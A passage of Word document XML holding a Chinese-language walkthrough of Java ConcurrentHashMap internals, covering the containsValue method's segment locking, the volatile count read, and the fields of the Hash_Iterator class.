          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> cleanSweep = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>true</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (mcsum != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w: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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i) {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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> c = segments[i].count;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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (mc[i] != segments[i].modCount) {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cleanSweep = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>false</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break</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (cleanSweep)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return</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false</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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// Resort to locking all segments</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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i)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segments[i].lock();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boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> found = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>false</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try</w:t>
      </w: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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i) {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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (segments[i].containsValue(value)) {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found = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>true</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break</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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w: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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i)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segments[i].unlock();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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> found;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p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00573A3A">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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同样注意内层的第一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>循环，里面有语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">int c = segments[i].count; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>却从来没有被使用过，即使如此，编译器也不能做优化将这条语句去掉，因为存在对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的读取，这条语句存在的唯一目的就是保证</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segments[i].modCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>读取到几乎最新的值。关于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>containsValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法的其它部分就不分析了，它和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法差不多。</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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>跨段方法中还有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>isEmpty()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，其实现比</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法还要简单，也不介绍了。最后简单地介绍下迭代方法，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>keySet(), values(), entrySet()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法，这些方法都返回相应的迭代器，所有迭代器都继承于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash_Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>提交时居然提醒我不能包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sh It</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，只得加了下划线</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，里实现了主要的方法。其结构是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>abstract</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Hash_Iterator{  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> nextSegmentIndex;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> nextTableIndex;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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HashEntry&lt;K,V&gt;[] currentTable;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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HashEntry&lt;K, V&gt; nextEntry;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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HashEntry&lt;K, V&gt; lastReturned;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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nextSegmentIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是段的索引，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nextTableIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nextSegmentIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>对应段中中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链的索引，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>currentTable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
